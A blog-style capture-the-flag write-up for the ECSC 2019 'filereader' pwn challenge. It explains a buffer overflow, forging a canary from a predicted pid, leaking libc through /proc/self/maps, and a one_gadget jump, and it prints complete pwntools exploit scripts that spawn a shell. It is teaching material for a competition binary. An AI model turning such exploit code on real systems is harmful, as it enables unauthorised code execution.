<!DOCTYPE html>
<html lang="en-en">
  <head>
    
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="generator" content="Hugo 0.52 with theme Tranquilpeak 0.4.3-SNAPSHOT">
<meta name="author" content="Hugo VINCENT">
<meta name="keywords" content="pwn, reverse, blog, hacking, Privacy, vie-privée, insa, cybersecurity, infosec, hack">
<meta name="description" content="Event Challenge Category Points Solves     ecsc2019 filereader pwn 1000 20    TL;DR We need to exploit binary which read the content of files listed in an other file. A buffer-overflow is present in one of the function and we can leak the address of libc thanks to /proc/self/map since we can read files. A onegadget is then used to pop a shell.">


<meta property="og:description" content="Event Challenge Category Points Solves     ecsc2019 filereader pwn 1000 20    TL;DR We need to exploit binary which read the content of files listed in an other file. A buffer-overflow is present in one of the function and we can leak the address of libc thanks to /proc/self/map since we can read files. A onegadget is then used to pop a shell.">
<meta property="og:type" content="article">
<meta property="og:title" content="Filereader">
<meta name="twitter:title" content="Filereader">
<meta property="og:url" content="https://hug0vincent.github.io/2019/05/filereader/">
<meta property="twitter:url" content="https://hug0vincent.github.io/2019/05/filereader/">
<meta property="og:site_name" content="Hugo">
<meta property="og:description" content="Event Challenge Category Points Solves     ecsc2019 filereader pwn 1000 20    TL;DR We need to exploit binary which read the content of files listed in an other file. A buffer-overflow is present in one of the function and we can leak the address of libc thanks to /proc/self/map since we can read files. A onegadget is then used to pop a shell.">
<meta name="twitter:description" content="Event Challenge Category Points Solves     ecsc2019 filereader pwn 1000 20    TL;DR We need to exploit binary which read the content of files listed in an other file. A buffer-overflow is present in one of the function and we can leak the address of libc thanks to /proc/self/map since we can read files. A onegadget is then used to pop a shell.">
<meta property="og:locale" content="en-us">

  
    <meta property="article:published_time" content="2019-05-21T19:11:39">
  
  
    <meta property="article:modified_time" content="2019-05-21T19:11:39">
  
  
  
    
      <meta property="article:section" content="write-ups">
    
      <meta property="article:section" content="ecsc2019">
    
  
  
    
      <meta property="article:tag" content="pwn">
    
      <meta property="article:tag" content="reverse">
    
  


<meta name="twitter:card" content="summary">











  <meta property="og:image" content="https://hug0vincent.github.io/images/profil.jpg">
  <meta property="twitter:image" content="https://hug0vincent.github.io/images/profil.jpg">


    <title>Filereader</title>

    <link rel="icon" href="https://hug0vincent.github.io/favicon.png">
    

    

    <link rel="canonical" href="https://hug0vincent.github.io/2019/05/filereader/">

    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css" integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin="anonymous" />
    

    
    <link href="https://fonts.googleapis.com/css?family=Montserrat:300,300i,400,700,700i&amp;subset=cyrillic,cyrillic-ext,latin-ext" rel="stylesheet"> 

    
    <link rel="stylesheet" href="https://hug0vincent.github.io/css/style-2wfjlq5nwe9qjygqo9yarila7qvjwdmv.min.css" />
    
    
      
        <link rel="stylesheet"  href="https://hug0vincent.github.io/css/custom.css">
      
    

    
      
    
    

    <script type="text/javascript">
      window.heap=window.heap||[],heap.load=function(e,t){window.heap.appid=e,window.heap.config=t=t||{};var r=t.forceSSL||"https:"===document.location.protocol,a=document.createElement("script");a.type="text/javascript",a.async=!0,a.src=(r?"https:":"http:")+"//cdn.heapanalytics.com/js/heap-"+e+".js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(a,n);for(var o=function(e){return function(){heap.push([e].concat(Array.prototype.slice.call(arguments,0)))}},p=["addEventProperties","addUserProperties","clearEventProperties","identify","resetIdentity","removeEventProperty","setEventProperties","track","unsetEventProperty"],c=0;c<p.length;c++)heap[p[c]]=o(p[c])};
        heap.load("381812841");
  </script>
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="4">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://hug0vincent.github.io/">Hugo</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://hug0vincent.github.io/page/about/">
    
    
    
      
        <img class="header-picture" src="https://hug0vincent.github.io/images/profil.jpg" alt="Author&#39;s picture" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="4">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://hug0vincent.github.io/page/about/">
          <img class="sidebar-profile-picture" src="https://hug0vincent.github.io/images/profil.jpg" alt="Author&#39;s picture" />
        </a>
        <h4 class="sidebar-profile-name">Hugo VINCENT</h4>
        
          <h5 class="sidebar-profile-bio">Student in computer security</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">Home</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/categories/posts">
    
      <i class="sidebar-button-icon fa fa-lg fa-pencil"></i>
      
      <span class="sidebar-button-desc">Posts</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/categories/write-ups">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">Write-Ups</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">Tags</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/page/about/">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">About</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/Hug0Vincent" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://www.root-me.org/hugow?lang=fr#70a472fd3f9279cb9095ce7cbd2cad00" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon rootme_logo "></i>
      
      <span class="sidebar-button-desc">Root-me</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://twitter.com/hugow_vincent" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-twitter"></i>
      
      <span class="sidebar-button-desc">Twitter</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://www.instagram.com/hugo_vincent__/" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-instagram "></i>
      
      <span class="sidebar-button-desc">Instagram</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      

    </ul>
  </div>
</nav>

      

      <div id="main" data-behavior="4"
        class="
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
            <div class="post-header main-content-wrap text-center">
  
    <h1 class="post-title" itemprop="headline">
      Filereader
    </h1>
  
  
  <div class="postShorten-meta post-meta">
    
      <time itemprop="datePublished" datetime="2019-05-21T19:11:39&#43;02:00">
        
  May 21, 2019

      </time>
    
    
  
  
    <span>in</span>
    
      <a class="category-link" href="https://hug0vincent.github.io/categories/write-ups">write-ups</a>, 
    
      <a class="category-link" href="https://hug0vincent.github.io/categories/ecsc2019">ecsc2019</a>
    
  

  </div>

</div>
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              

<table>
<thead>
<tr>
<th align="center">Event</th>
<th align="center">Challenge</th>
<th align="center">Category</th>
<th align="center">Points</th>
<th align="center">Solves</th>
</tr>
</thead>

<tbody>
<tr>
<td align="center">ecsc2019</td>
<td align="center">filereader</td>
<td align="center">pwn</td>
<td align="center">1000</td>
<td align="center">20</td>
</tr>
</tbody>
</table>

<h1 id="tl-dr">TL;DR</h1>

<p>We need to exploit binary which read the content of files listed in an other file. A buffer-overflow is present in one of the function and we can leak the address of libc thanks to <em>/proc/self/map</em> since we can read files. A onegadget is then used to pop a shell.</p>

<h1 id="recon">Recon</h1>

<p>First we check the protections, NX and PIE are enabled which mean we won&rsquo;t be able neither to execute code nor use gadgets to do a ropchain.</p>



 
  
  
  
  
    
  
    
      
    
  
    
      
    
  

<div class="figure fig-100 center" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/filereader/sec.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/filereader/sec.png" >
  
    </a>
  
  
</div>


<p>The binary ask for a file which should contain a list of other files. Then it will display the content of each file if the permissions are ok. I load the binary into ghidra and spot many interesting things.</p>

<p>First we can spot a buffer overflow in the <span class="highlight-text orange">fscanf</span> function which doesn&rsquo;t check for the size of the filename. (<em>local_118</em> is a pointer to the file containing the filenames of the files to read and <em>auStack272</em> is a 260 bytes long buffer)</p>



 
  
  
  
  
    
  
    
      
    
  
    
      
    
  

<div class="figure fig-100 center" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/filereader/fscanf.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/filereader/fscanf.png" >
  
    </a>
  
  
</div>


<p>But we have to bypass some custom stack cookies, indeed the binary is not stripped and we can see the <span class="highlight-text orange">canarie</span> variable wich is push on the stack at the beginning of the execution :</p>



 
  
  
  
  
    
  
    
      
    
  
    
      
    
  

<div class="figure fig-100 center" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/filereader/canarie1.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/filereader/canarie1.png" >
  
    </a>
  
  
</div>


<p>And then checked at the end.</p>



 
  
  
  
  
    
  
    
      
    
  
    
      
    
  

<div class="figure fig-100 center" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/filereader/canarie2.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/filereader/canarie2.png" >
  
    </a>
  
  
</div>


<p>It&rsquo;s not secure at all since the <span class="highlight-text orange">pid</span> can be predicted and so the canarie can be forged to bypass the protection.</p>

<h1 id="exploit-part1">Exploit part1</h1>

<p>We now have everything to start writing our exploit, I like python for pwn challenge, but the random implementation of python is different from the one used in C so I wrote a really simple program which return a random number depending of the input like in the binary.</p>


  
    
  
  
    
  
  
  


<figure class="highlight c language-c">
  <figcaption>
    
      <span>rand.c</span>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-c"><code class="c">#include &lt;stdio.h&gt;

int main(int argc, char **argv)
{
  int pid = atoi(argv[1]);
  int canarie = 0;
  srand(pid);
  canarie = rand();
  printf(&#34;%d\n&#34;, canarie);
}</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>

<p>Let start writing some python and see :</p>


  
    
  
  
    
  
  
  


<figure class="highlight python language-python">
  <figcaption>
    
      <span>exploit.py</span>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-python"><code class="python">from pwn import *
import os

FILE = &#34;/tmp/file&#34;

pid = os.getpid()
log.info(&#34;pid : &#34;&#43;str(pid))

#Return the canarie from the predicted pid
p = process([&#39;./rand&#39;, str(pid&#43;5)])
canarie = p.recvline().strip()
p.close()

log.info(&#34;canarie : &#34;&#43;str(canarie))

#size of the buffer containing the filename
offset = 260

payload = &#34;&#34;
payload &#43;= &#34;A&#34; * offset
payload &#43;= p64(int(canarie))
payload &#43;= p32(0x0)             #ebp
payload &#43;= p64(0xdeadbeef)      #return address

f = open(FILE, &#39;w&#39;)
f.write(payload)
f.close()

r = process([&#39;./filereader&#39;, &#39;/tmp/file&#39;])
print r.recvall()</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>

<p>I found that the filereader binary would be launched with a pid increased by 5 from the python script. Then run it&hellip; and we don&rsquo;t have the message saying <em>Stack smashing detected!</em> anymore, instead we have a <span class="highlight-text orange">segfault</span> due to <span class="highlight-text orange">0xdeadbeef</span> address.</p>



 
  
  
  
  
    
  
    
      
    
  
    
      
    
  

<div class="figure fig-100 center" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/filereader/test1.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/filereader/test1.png" >
  
    </a>
  
  
</div>


<h1 id="exploit-part2">Exploit part2</h1>

<p>Ok, but now what ? Where should we jump since we control <span class="highlight-text orange">rip</span> ? As I said at the beginning no ropchain and no shellcode because of PIE and NX protections. We need to leak an address from the libc and then found a <a href="https://github.com/david942j/one_gadget">onegadget</a> to get our shell. This is the tricky part and I stayed stuck here for some days. But wait we have a binary which read files, so we can read <span class="highlight-text orange">/proc/self/maps</span> which contain the address of the code, the stack, the heap and the libc !</p>

<p>My idea was to create a file like this :</p>


  
    
  
  
    
  
  
  


<figure class="highlight bash language-bash">
  <figcaption>
    
      <span>/tmp/file</span>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-bash"><code class="bash">/proc/self/maps
/tmp/a
/tmp/a
/tmp/a
/tmp/a
[...]
/tmp/a
/tmp/a
/tmp/a
PAAAAAAAAAAAAAAYLOAD</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>

<p>If there is enought <em>/tmp/a</em> the process will be too busy to read them and we will be able to write our payload from the first part at the end of this file.</p>

<p>Before we need the address of a onegadget.</p>



 
  
  
  
  
    
  
    
      
    
  
    
      
    
  

<div class="figure fig-100 center" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/filereader/onegadget.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/filereader/onegadget.png" >
  
    </a>
  
  
</div>


<p>Here is the final exploit :</p>


  
    
  
  
    
  
  
  


<figure class="highlight python language-python">
  <figcaption>
    
      <span>exploit.py</span>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-python"><code class="python">from pwn import *
import os

FILE = &#34;/tmp/file&#34;
TMP_FILE = &#34;/tmp/a&#34;
MAX = 500

#parse the ouptut of /proc/self/maps
#and return the address of libc
def getAddress(r, line):
    lines = r.split(&#39;\n&#39;)
    return lines[line].split(&#39;-&#39;)[0]

pid = os.getpid()
log.info(&#34;pid : &#34;&#43;str(pid))

p = process([&#39;./rand&#39;, str(pid&#43;5)])
canarie = p.recvline().strip()
p.close()
log.info(&#34;canarie : &#34;&#43;str(canarie))

offset = 260

#Write some content to /tmp/a
f = open(TMP_FILE, &#39;w&#39;)
f.write(&#39;gonna pwn you&#39;)
f.close()

f = open(FILE, &#39;w&#39;)
f.write(&#34;/proc/self/maps\n&#34;)

#fill the file with /tmp/a
for i in range(0,MAX):
    f.write(TMP_FILE&#43;&#39;\n&#39;)

f.close()


r = process([&#39;./filereader&#39;, &#39;/tmp/file&#39;])
r.recvline()

maps = r.recvuntil(&#39;Attempting to read file&#39;)
libc_base = getAddress(maps, 4)

execve = 0x3f306
jump = execve &#43; int(libc_base,16)

payload = &#34;&#34;
payload &#43;= &#34;A&#34; * offset
payload &#43;= p64(int(canarie))
payload &#43;= p32(0x0)
payload &#43;= p64(jump)

#a option for append
f = open(FILE, &#39;a&#39;)
f.write(payload)
f.close()

print r.recvline()

#BOOM shell
r.interactive()</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>

<h1 id="flag">Flag</h1>



 
  
  
  
  
    
  
    
      
    
  
    
      
    
  

<div class="figure fig-100 center" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/filereader/flag.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/filereader/flag.png" >
  
    </a>
  
  
</div>


              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">TAGGED IN</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://hug0vincent.github.io/tags/pwn/">pwn</a>

  <a class="tag tag--primary tag--small" href="https://hug0vincent.github.io/tags/reverse/">reverse</a>

                  </div>
                
              
            
            <div class="post-actions-wrap">
  
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--disabled">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://hug0vincent.github.io/2019/05/give-me-your-shell/" data-tooltip="Give Me Your Shell">
              
                  <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://hug0vincent.github.io/2019/05/filereader/">
              <i class="fa fa-facebook-official"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://hug0vincent.github.io/2019/05/filereader/">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
        
      
      
        <li class="post-action">
          <a class="post-action-btn btn btn--default" href="#disqus_thread">
            <i class="fa fa-comment-o"></i>
          </a>
        </li>
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  
</div>

            
              
                <div id="disqus_thread">
  <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2019 Hugo VINCENT. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="4">
        <div class="post-actions-wrap">
  
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--disabled">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://hug0vincent.github.io/2019/05/give-me-your-shell/" data-tooltip="Give Me Your Shell">
              
                  <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://hug0vincent.github.io/2019/05/filereader/">
              <i class="fa fa-facebook-official"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://hug0vincent.github.io/2019/05/filereader/">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
        
      
      
        <li class="post-action">
          <a class="post-action-btn btn btn--default" href="#disqus_thread">
            <i class="fa fa-comment-o"></i>
          </a>
        </li>
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  
</div>

      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="4">
  <i id="btn-close-shareoptions" class="fa fa-close"></i>
  <ul class="share-options">
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fhug0vincent.github.io%2F2019%2F05%2Ffilereader%2F">
          <i class="fa fa-facebook-official"></i><span>Share on Facebook</span>
        </a>
      </li>
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://twitter.com/intent/tweet?text=https%3A%2F%2Fhug0vincent.github.io%2F2019%2F05%2Ffilereader%2F">
          <i class="fa fa-twitter"></i><span>Share on Twitter</span>
        </a>
      </li>
    
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="https://hug0vincent.github.io/images/profil.jpg" alt="Author&#39;s picture" />
    
    <h4 id="about-card-name">Hugo VINCENT</h4>
    
      <div id="about-card-bio">Student in computer security</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Student at INSA / SIF master
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        France
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" rel="noopener" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="Search" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center">no post found</div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://hug0vincent.github.io/2019/05/filereader/">
                <h3 class="media-heading">Filereader</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Event Challenge Category Points Solves     ecsc2019 filereader pwn 1000 20    TL;DR We need to exploit binary which read the content of files listed in an other file. A buffer-overflow is present in one of the function and we can leak the address of libc thanks to /proc/self/map since we can read files. A onegadget is then used to pop a shell.</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://hug0vincent.github.io/2019/05/give-me-your-shell/">
                <h3 class="media-heading">Give Me Your Shell</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Event Challenge Category Points Solves     inshack-2019 gimme-your-shell pwn 50 67    TL;DR This is a remote buffer overflow challenge, there is no protection on the binary but ASLR is enable on the remote server. I redirected the execution flow to write my shellcode to a controled area, then jump to it and execute it.
Getting informations First I looked at the protections on the binary :</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://hug0vincent.github.io/2018/12/mission-impossible-1/">
                <h3 class="media-heading">Mission impossible 1</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Dec 12, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Event Challenge Category Points Solves     santhacklausctf mi1 Forensic/Crypto 800 18    TL;DR After downloading the zip file we were faced with a linux memory dump. After building the correct profile for volatility you had to perform a known plain text attack on an encrypted and splited zip file to recover the file flag.txt.
Introduction After downloading the file MI1.zip we had a memdump.</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://hug0vincent.github.io/2018/12/mission-impossible-2/">
                <h3 class="media-heading">Mission impossible 2</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Dec 12, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Event Challenge Category Points Solves     santhacklausctf mi2 Forensic/Crypto/network 500 22    TL;DR In the second part of the challenge we also had a memory dump of a Debian system and a network capture. When you analyse the network capture you can see that some data were exfiltrated, if you look into the memdup you can see that the tool DET (Data Exfiltration Toolkit), has been used to exfiltrate the data.</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero="no post found"
         data-message-one="1 post found"
         data-message-other="{n} posts found">
         4 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://hug0vincent.github.io/images/bg2.jpg');"></div>
  


    
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js" integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw=" crossorigin="anonymous"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.7/js/jquery.fancybox.min.js" integrity="sha256-GEAnjcTqVP+vBp3SSc8bEDQqvWAZMiHyUSIorrWwH50=" crossorigin="anonymous"></script>


<script src="https://hug0vincent.github.io/js/script-hbdqx7wlhrscaipt6txjo74wihw1bagwt97hjgdefg9y8kq3xpotphkbsilg.min.js"></script>


<script lang="javascript">
window.onload = updateMinWidth;
window.onresize = updateMinWidth;
document.getElementById("sidebar").addEventListener("transitionend", updateMinWidth);
function updateMinWidth() {
  var sidebar = document.getElementById("sidebar");
  var main = document.getElementById("main");
  main.style.minWidth = "";
  var w1 = getComputedStyle(main).getPropertyValue("min-width");
  var w2 = getComputedStyle(sidebar).getPropertyValue("width");
  var w3 = getComputedStyle(sidebar).getPropertyValue("left");
  main.style.minWidth = `calc(${w1} - ${w2} - ${w3})`;
}
</script>

<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight > code, pre > code').each(function(i, block) {
    if (!$(this).hasClass('codeblock')) {
      $(this).addClass('codeblock');
    }
    hljs.highlightBlock(block);
  });
});
</script>


  
    
      <script>
        var disqus_config = function () {
          this.page.url = 'https:\/\/hug0vincent.github.io\/2019\/05\/filereader\/';
          
            this.page.identifier = '\/2019\/05\/filereader\/'
          
        };
        (function() {
          
          
          if (window.location.hostname == "localhost") {
            return;
          }
